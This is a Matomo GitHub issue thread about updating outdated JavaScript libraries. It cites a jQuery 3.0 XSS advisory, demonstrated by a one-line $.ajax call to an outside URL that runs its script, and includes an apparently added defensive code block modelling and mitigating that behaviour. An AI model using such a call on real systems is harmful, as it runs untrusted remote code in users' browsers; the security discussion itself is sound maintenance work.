@Findus23 opened this Issue on May 23rd 2018 Member

I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328, which affects all jQuery versions <3.0.0.
Simply put, running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in https://github.com/matomo-org/matomo/commit/99793151cd6d4f318b7a011509bd421685f0537a) to fall back to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies
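The behaviour behind that advisory, reduced to a small model as an added example (this is not Matomo's ajaxhelper nor jQuery's code): when a jQuery < 3.0 $.ajax call omits dataType, the response Content-Type decides how the body is handled, and a script-like Content-Type means the body is evaluated. Forcing a default of "json", as the ajaxhelper does, removes that path regardless of what the server answers. The function names (inferDataType, responseWouldBeEvaluated, isCrossDomain, buildSafeAjaxOptions), the origin https://matomo.example and the constructed responses are assumptions of this example; the Content-Type matching is a simplified rendering of jQuery's converter selection, not a copy of it.

```javascript
// Added example, not Matomo or jQuery code. Models jQuery < 3.0 dataType
// inference and a hardened option builder that mirrors the "fall back to json"
// idea of Matomo's ajaxhelper. All names and sample values are assumptions.

// Simplified stand-in for jQuery's Content-Type based converter selection.
function inferDataType(requestedDataType, responseContentType) {
  // An explicit dataType wins; jQuery only sniffs when it is absent or "*".
  if (requestedDataType && requestedDataType !== "*") {
    return requestedDataType;
  }
  const ct = String(responseContentType || "").toLowerCase();
  if (/(?:java|ecma)script/.test(ct)) return "script"; // body would be eval'd
  if (ct.includes("json")) return "json";
  if (ct.includes("xml")) return "xml";
  return "text";
}

// True when the response body would be handed to the script converter.
function responseWouldBeEvaluated(requestedDataType, responseContentType) {
  return inferDataType(requestedDataType, responseContentType) === "script";
}

// Resolve the request URL against the page origin and compare origins.
function isCrossDomain(url, pageOrigin) {
  const target = new URL(url, pageOrigin);
  return target.origin !== new URL(pageOrigin).origin;
}

// Hardened option builder: a missing dataType becomes "json" (the ajaxhelper
// fallback), and script-style dataTypes are refused for cross-origin URLs.
// This policy is the example's own, not a description of jQuery 3's fix.
function buildSafeAjaxOptions(options, pageOrigin) {
  const safe = Object.assign({}, options);
  if (!safe.dataType || safe.dataType === "*") {
    safe.dataType = "json";
  }
  const scriptLike = safe.dataType === "script" || safe.dataType === "jsonp";
  if (scriptLike && isCrossDomain(safe.url, pageOrigin)) {
    throw new Error(`refusing cross-origin ${safe.dataType} request to ${safe.url}`);
  }
  return safe;
}

// Constructed responses for illustration; neither is a real capture.
const SAMPLE_RESPONSES = [
  { contentType: "text/javascript; charset=utf-8", body: "alert(1)" },
  { contentType: "application/json; charset=utf-8", body: "{\"ok\":true}" },
];

// Show the difference between an unspecified dataType and a forced "json".
function compareHandling() {
  return SAMPLE_RESPONSES.map((r) => ({
    contentType: r.contentType,
    evaluatedWithoutDataType: responseWouldBeEvaluated(undefined, r.contentType),
    evaluatedWithJson: responseWouldBeEvaluated("json", r.contentType),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(compareHandling());
  // Usage with jQuery would be: $.ajax(buildSafeAjaxOptions(opts, location.origin))
  console.log(buildSafeAjaxOptions({ url: "index.php?module=API" }, "https://matomo.example"));
}

module.exports = { inferDataType, responseWouldBeEvaluated, isCrossDomain, buildSafeAjaxOptions, compareHandling };
```

The point the table makes is that the server, not the caller, picks the converter when dataType is omitted, so a wrapper that always supplies one is the cheap mitigation while a library upgrade is pending.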

@tsteur commented on May 23rd 2018 Member

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23 commented on May 23rd 2018 Member

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
https://github.com/Dogfalo/materialize/issues/3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur commented on May 23rd 2018 Member

@Findus23 that will be in MaterializeCSS 1.0 but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version and only as part of Matomo 4.0 as it may be hard for plugins to keep them compatible with 0.X version and 1.X version of MaterializeCSS etc. But maybe it is not really an issue, it is just a matter of testing and seeing how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@Findus23 commented on October 12th 2018 Member

BTW: MaterializeCSS 1.0 just came out.

@mmakos-profidata commented on September 16th 2019

Is there a chance that this issue will be resolved in the next version (3.12.0)?

@diosmosis commented on September 16th 2019 Member

It's probably not something I will finish for 3.12, but someone else could finish the work I started.

@tsteur commented on September 16th 2019 Member

I'm not sure what exactly we're planning to upgrade? jQuery we likely can't update since Materialize is not compatible, and we very likely don't want to update Materialize to 1.0 as there are a lot of breaking changes AFAIK and plugins become incompatible and we would not be able to have plugins compatible with new and older versions of Matomo and it would be a lot of work to update them all if/where needed. This would be rather something for Matomo 4.

@Findus23 commented on September 16th 2019 Member

While I’m normally the one to argue for updating everything, I have to agree here. Most libraries are outdated enough that it isn’t just a quick patch update. And updating everything at once with Matomo 4 makes it easier as things only have to be fixed once and allows enough testing to make sure everything works well.

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Lukas


@tsteur commented on September 16th 2019 Member

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Totally, only problem is really when they have major updates with breaking changes. In general the goal should be to update minor and patch releases of libs during a release.
